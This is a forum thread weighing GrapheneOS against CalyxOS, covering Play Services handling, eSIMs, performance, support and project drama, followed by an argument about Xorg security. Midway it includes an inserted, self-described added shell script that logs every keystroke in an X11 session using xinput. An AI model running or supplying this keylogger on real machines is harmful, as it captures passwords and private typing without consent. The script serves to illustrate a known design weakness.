GrapheneOS vs CalyxOS (In-depth-ish), which should I choose?

Greetings fellow privacy fans! I know that this topic has been discussed to death, but I feel as though this can add to the overall discussion. This also may hopefully end up being a decent summary of both ROMs.
With the Pixel 6a coming out soon, I am looking to flash either CalyxOS or GrapheneOS. I would like to choose the correct OS for me before I get the phone, as once I flash one or the other, I do not see myself changing it.

My threat model does not require the greatest security of all time, but something that could at least prevent someone from getting into the phone if it sat unattended for short periods of time. I would prefer as much privacy as reasonably possible. (Being anonymous is unimportant for my threat model.)

Recommendations from a few privacy-centered people.
Techlore: On the resource page Techlore recommends CalyxOS. (If I remember correctly Techlore used to recommend GrapheneOS first before trying CalyxOS, not sure anymore due to the drama.)
The New Oil: Seems to recommend GrapheneOS (Recommends CalyxOS too, but leans more towards GrapheneOS)
The Hated One: Recommends GrapheneOS (Seems to be for more extreme threat models.)
Mental Outlaw: Recommends CalyxOS (He believes good operation security to be the key to privacy.)
Privacy Guides: Recommends GrapheneOS on Pixel 6 devices. (Only recommends CalyxOS for OnePlus phones and Fairphones. Not sure why they only recommend GrapheneOS otherwise.)
(These sources are certainly not exhaustive, but I believe these are certainly some of the most trusted.)

(Corrections encouraged, it's why I posted.)
Privacy.
Both can be completely de-Googled, but that is impractical, so both ROMs have a solution. CalyxOS's solution is microG. It runs with important permissions (not sure on the official terminology) but sends less data back to Google than regular Google Play Services. Graphene's solution is sandboxed Google Play Services. This sends less data too and can be tuned to what permissions it has, and therefore what data it can send (please correct me if I am wrong about sandboxed Google Play.) It also runs with fewer permissions.
If possible I would like to choose which apps get to use or not use microG or sandboxed Google Play Services. I know this can be done with user profiles, but at this time it disables notifications on the user profile not in use, which is not a feasible option for my use case.
Do work profiles solve this issue? And if so, would this put CalyxOS in a slightly better position as they have built in work profiles and do not rely on a third party app to create a work profile?
A final privacy note is with eSIMs. CalyxOS still sends phone information to Google with eSIMs. (I believe the specific information sent is listed on the Privacy Guides website.) I assume this is only an issue with phones that support eSIMs. But is this even an issue if someone decides to just not use eSIMs? Can this be disabled? Or is this just something CalyxOS needs to improve?
(Final note, on privacy I will not be typing anything about location as I plan to keep anything to do with location off.)

Security.
From my simple understanding, GrapheneOS improves upon the default AOSP security standards and CalyxOS maintains it. I have only partially read the GrapheneOS website on what improvements GrapheneOS makes to security, and while some of the improvements sound like they would be cool to have, I am not sure that I actually need any of them. Anything that is practical let me know.
(Passwords, for example: GrapheneOS extends the allowed length past 16 characters. But I cannot use something like KeePassDX to access my phone, so I have to physically type the characters; typing 16 already takes me a long time, so is it really worth it to have more? Is there a better way that avoids biometrics?)

Performance.
CalyxOS performs the same if not better than default AOSP. GrapheneOS due to hardening is slower than default AOSP. This is my understanding from Techlore’s comparison video (Which seems to have been taken down due to age if I am not mistaken.) My main question being, is this still the case? Or due to the Pixel 6 having physical hardware improvements, do the two ROMs have similar performance speed? Or is performance speed completely different from what I have described here?

The people behind each custom ROM.
GrapheneOS I believe has a small team of at least two members to my knowledge. The leader seems to have intentionally gotten into drama. While this may have in no way affected GrapheneOS as a ROM, it does not inspire confidence. CalyxOS is made by the Calyx Institute which to my knowledge (again) is also a small team. I thought I saw somewhere that the Calyx Institute got into some drama? This may just have been from someone who is trying to incite a privacy scare. But I would still like to verify anyway, as it may or may not affect my final decision.

Support
Before I close, I have one final concern: support. If you couldn't tell, I am waiting for the 6a to save money, as it is basically a cheaper version of the 6. I have heard that CalyxOS supports phones a bit longer than GrapheneOS. I am aware that Google themselves have to provide security updates to the Pixel, but I would like to not have to buy another phone for as long as possible. And if CalyxOS does support what they can for just a tiny bit longer, it may sway my decision.

Well that was long. Looking forward to replies!

(There is a good summary of questions in the replies.) (Also why did I get a thumbs down? I am confused.)


Hi :)

Both GrapheneOS and CalyxOS are very good options for private and secure phones :)

You already mentioned the biggest differences between the two.

For choosing which to use: that depends on your threat model, your use case, and which OS you like better and/or feel better with :)

The reason why Graphene has a shorter support time for hardware is: they only support a Pixel as long as it is getting security patches from Google. Not getting security patches for the hardware from the manufacturer makes a phone increasingly insecure with time, as bugs and exploits do not get patched anymore.

As for why Graphene only supports Pixels: because they allow flashing of 3rd-party operating systems with their own keys for secure boot, so after the installation the bootloader can be re-locked and the Android security model can be preserved, and the Pixel phones have one of the most secure hardware architectures of modern phones.

This thread: How private is using the sandboxed Google Play Services?

and this thread: GrapheneOS vs CalyxOS

also go into the differences between Graphene and Calyx, where you can also find some additional input :)

I hope it helps. Just know either operating system will greatly increase the security and privacy of your phone compared to the operating systems that come preinstalled on phones.


Thank you for your reply!
I have actually read GrapheneOS’s reason for only using pixels and why GrapheneOS only supports as long as google gives security patches and it makes sense. I have also looked into both of those threads. I am mainly looking for the answer of these questions from the main topic. (Hopefully this reply makes this more clear.)

Are any of the sources I mentioned untrustworthy?
Do work profiles solve the issue I mentioned previously?
Is there a way or method to solve the eSIM issue with CalyxOS?
Is there something major from GrapheneOS that I am missing security-wise?
Is performance of both ROMs similar to what was shown in one of Techlore’s unlisted videos?
Was there any drama only involving CalyxOS, or have I been lied to?
And finally does CalyxOS give updates longer than google provides firmware updates?

eSIMs: On GrapheneOS you first need to install Google services to be able to partition new eSIMs. Already installed eSIMs keep working. No Google needed. I do not know how it works on Calyx; I assume it works with microG.
On Graphene you can install Google services (no need to log into the Google services) in a separate profile, partition an eSIM and then delete the profile, and the other profiles can keep using the eSIM without the need to install Google services on them.

Work profiles: I don't exactly know if they isolate Google services on Calyx, but on Graphene cross-profile notifications are currently in development (it will not help now, but in the future).

About the drama: I don't know any details (I avoid drama online, life is too short and there is too much drama online).
Without taking any sides: strong opinions by strong personalities (I hope it's the right term, English is my 2nd language so sometimes meanings are lost in translation). As mentioned above, I don't know enough about it to form an informed opinion.

The sources: Honestly I am too new to the online privacy community to tell you which source is trustworthy or untrustworthy, as I am still in the process of learning stuff and I only know half of the ones you listed.

Performance: On a Pixel 6 they should perform very similarly. About the video I can't say, as I don't know it since it's unlisted.

Updates: I do not know.

I hope my limited answers could help you somehow :)

Regardless of which operating system you choose, they will greatly increase the privacy and security of your phone compared to stock :)


When it comes to how to interpret drama in an open source project that’s security related, I don’t have a ton of experience but here are my thoughts. You would need to look into what exactly are the claims being made by people and if they hold up. The privacy-conscious community is small, and the number of people who make software for us is smaller still. It only takes a few people to make a stink.

Now, does that mean that a project is not secure? Not necessarily. Because it’s open source it can all be verified. Both ROMs are still recommended by the broader community. However, if you’re trying to include drama as part of your decision making criteria, look at recent examples of FOSS projects that were intentionally sabotaged by their developers. If you see behavior in a project’s community that is in the threat model you are trying to protect against, like harassment, consider whether you are fine with that community providing a given tool for you.

I could be speaking from inexperience here. I know we can all get passionate sometimes so I think we can be gracious in this area.


Yep. Note: GrapheneOS is fully de-Googled by default and lets you completely remove sandboxed Play Services if you installed them. On CalyxOS you get to choose on first startup whether you want to install microG or not. If you choose to install microG you can't fully remove it, but you can disable it (similar to how it works on stock Android).

microG uses signature spoofing so apps think that microG is signed by Google, and this way it is also valid. This requires microG to have some high privileges and to be installed as a system app. This means that microG becomes a higher-value target because it's less sandboxed than other apps. On GrapheneOS sandboxed Play Services are on the same level as any other app. It doesn't have access to anything on the system level and can only have as many permissions as you grant it as a user. I think both solutions send approximately the same amount of data to Google. microG sends less, while sandboxed Play Services limits what can be sent.

Read this: Usage guide | GrapheneOS
You probably mean the time apps take to start.
It's a security feature and it's mostly noticeable on older Pixel devices, but if you would rather have faster app spawning you can disable this in the settings.

Calyx and Graphene can only update as long as Google provides updates for the devices. Calyx goes a bit further and continues support for the open components of a phone. Here is a quote from their website:

[…] are no longer being updated by Google, so the CalyxOS releases for these devices only contain the fixes to the open source components, such as the OS code and the Linux kernel. Proprietary components such as the bootloader, modem firmware, and other firmware no longer get updates.

Personally I think I would go with GrapheneOS since it seems to do most of the stuff Calyx does but better.


The guy spreads FUD. Could write an essay debunking this guy.

Both are completely de-Googled. microG in Calyx has elevated privileges and has more attack surface, rendering your device insecure. Calyx loves its elevated stuff though. It also includes the privileged extension of F-Droid, an insecure app store.

Graphene spawns fresh processes instead of using Android's zygote model, which does have some minimal performance impact but is unnoticeable on any modern Pixel device.

Micay had some beef with the CEO of Copperhead. Due to their ideological differences Micay exited the company, and while exiting the company Micay deleted the cryptographic keys of Copperhead, saying he won't let him harm the users. Copperhead had some losses as they were not able to push software updates or publish apps. The two got into a legal battle and people took sides. CalyxOS members and many others were against Micay when clearly he had done nothing wrong. They also started harassing him and attacking him personally to the point that he felt suicidal even (from what I heard). It's only fair for Micay to hold a grudge against Calyx.

Note: I have largely oversimplified this whole event. I understand that anyone close to Micay or Micay might feel bad that I left out some details. I apologize in advance.

What should you choose if you had to choose between Graphene and Calyx?

=>GrapheneOS.

There are no security features in Calyx that are not in Graphene, but there are a lot of security features in Graphene that are not in Calyx.

Should I consider niche custom ROMs like Lineage?

=> No. Lineage and all its derivatives have a lot of security features missing.


It has been a while, so I should update the main post, but in the meantime I would like to clarify things.

I would like to see the essay. I have watched his videos for about a year. Some stuff appears outdated, but very rarely do I see him spreading any FUD. Most of what he says lines up with Techlore, especially Surveillance Report, as occasionally they will cover the same stories. Or he does cooking tutorials (which can hardly be considered FUD).

(This is edited to remove stuff that could cause drama)
Okay, I have noticed, Mr. Sting Ray, that you seem to get into a lot of debates with fellow forum users. There is one thing I would like to avoid and that is drama.

An example that concerns me:

Are you really nitpicking based off a single word? I mean, you could say that neither is truly de-Googled as they are on a Pixel phone, which is made by Google. I would prefer to stay on friendly terms as the conversation continues, but I am not sure how possible this is.

Also, if you're curious, I went with GrapheneOS in the end without sandboxed Play Services, as I found none of my apps actually need them. (Also, why not just use a different app store or RSS feed?)

P.S. Dang, I wish this came off as friendlier, but this seems difficult through text.

  • Continues to spread misinformation about how FOSS is more secure than proprietary software.

  • Claims Linux is more secure than Windows and brings up the whole "security through obscurity" argument.

  • Promotes niche FOSS browsers that don't have security in mind. And when not doing that, shills for Chromium.

  • Promotes rooting/jailbreaking of Android/iOS phones for security/privacy.

  • Promotes using distros and desktop environments using Xorg (Linux Mint, XFCE, etc.).

Wow, that was a fast reply, I am impressed.

First, not an essay. This disappoints me.

Second: FOSS may or may not be more secure, does it matter much?

Third: I am unfamiliar with him ever bringing up obscure browsers. Source?

Fourth: I don’t remember him promoting Jailbreaking, but I believe I recall him mentioning that he would do it.

Fifth: I mean, The New Oil promotes Linux Mint too, so I don't see the problem. (Also, I am not familiar with Xorg.)

Kinda does.

On Xorg any (non-privileged) application can see other applications' screens and see what you type, including but not limited to your root password. It's worse than a keylogger.

I am a fan of his Surveillance Report videos as they cover a lot of reports and stuff. (Yes, I know about RSS readers.) It's a shame that he promotes Linux Mint (although I don't know that for sure, as I don't see videos on The New Oil). Any distro using Xorg shouldn't be used at any threat model, even if you are a grandma. Windows Vista is more secure than these Linux distros.

Or if you are using Windows/Mac, just don't switch to Linux. It's possible to improve the privacy on these systems. I don't know why people don't understand this, but security is directly proportional to privacy.
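The Xorg point in the post above is easy to verify on any X11 desktop. The script below is an added example, not code from this thread or from any of the projects discussed: using only the stock `xinput` and `xmodmap` tools, an ordinary unprivileged X client attaches to the keyboard device and prints every key pressed in the session, whichever window has focus. It assumes an Xorg session with `$DISPLAY` set and those two tools installed; the device-name filtering and temp-file path are assumptions for the example.

```shell
#!/bin/sh
# Added example (not from the thread): an unprivileged X11 client logging
# every keystroke in the session with stock tools. Nothing here needs root.
# Assumes an Xorg session ($DISPLAY set) plus the xinput and xmodmap tools.

# Map an X keycode to its first (unshifted) keysym using an `xmodmap -pke`
# table read on stdin, e.g. "keycode  38 = a A a A" -> "a".
# Pure text processing, so it can be exercised without a display.
keycode_to_keysym() {
    awk -v kc="$1" '
        $1 == "keycode" && $2 == kc { print ($4 == "") ? "<none>" : $4; exit }
    '
}

# Pick the first real slave keyboard from `xinput list`, skipping the
# virtual XTEST device (assumption: the physical keyboard is listed as
# "slave  keyboard", which is how xinput formats it).
first_keyboard_id() {
    xinput list | grep -v XTEST \
        | sed -n 's/.*id=\([0-9][0-9]*\).*slave *keyboard.*/\1/p' | head -n 1
}

# Stream decoded key presses to stdout until interrupted.
# Exit codes: 2 = no X display to attach to, 3 = no keyboard device found.
x11_keystroke_sniff() {
    [ -n "$DISPLAY" ] || return 2
    kbd_id=$(first_keyboard_id)
    [ -n "$kbd_id" ] || return 3
    keymap="${TMPDIR:-/tmp}/keymap.$$"
    xmodmap -pke > "$keymap"
    # `xinput test` prints lines such as "key press   38" / "key release 38";
    # only presses are decoded, so each printed line is one typed key.
    xinput test "$kbd_id" | while read -r kind action code; do
        [ "$kind $action" = "key press" ] || continue
        keycode_to_keysym "$code" < "$keymap"
    done
    rm -f "$keymap"
}

# Run with `sh sniff.sh --run` in a terminal, then type into any other window.
if [ "${1:-}" = "--run" ]; then
    x11_keystroke_sniff
fi
```

The takeaway is the one the post makes: on Xorg the boundary between applications is not enforced by the display server, so a sandboxed app store or a hardened browser does not protect a password typed into a different window. On Wayland compositors, an equivalent client needs a privileged protocol or a portal, which is why the replies below point at Wayland-based setups.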

Interesting, I would like to see more examples of niche browser recommendations, as just one recommendation isn't too worrying, since anyone should be using multiple sources.

Not always, but in many cases. I am sure you know of the example I’d give.

Is Xorg online or offline? Does it actively transmit data? I guess I can ask for more sources?

And finally, I want an essay.

Also we should probably start a new thread/dm so it doesn’t clutter this thread.

The fuck? Anyone could build an app that can be used for data exfiltration. How is that having privacy? What does it matter if Xorg is online or offline? Would you have this poor security on your device?
Privacy does not only equal protection from government spying and big tech spying.

See Joanna Rutkowska's (founder of QubesOS) blog.
She pointed out the insecurities in 2009. Only 2 DEs and 1 window manager support Wayland in 2022.
The issues were not addressed by the X.Org Foundation.

Language.
It matters because, for one, it is an active threat that is already an issue if the data has already been sent; for another, if Xorg is only on-device it can most likely be removed and logs cleared with no issue. I mean, there could be many reasons for having it; accidents happen, or it could be required for something.

Thread, this might be interesting for others.

The Xorg vulnerability is valid, but I also agree with your point that having some privacy, depending on who you are trying to be private from, is possible even though security is not the highest. You don't need maximum security first before having privacy. They do work together, and increasing security does tend to increase privacy. But just as you can have good security and poor privacy, you can also have good privacy and poor security.

But do try to have more secure options where possible and reasonable (i.e. Wayland via Fedora)!
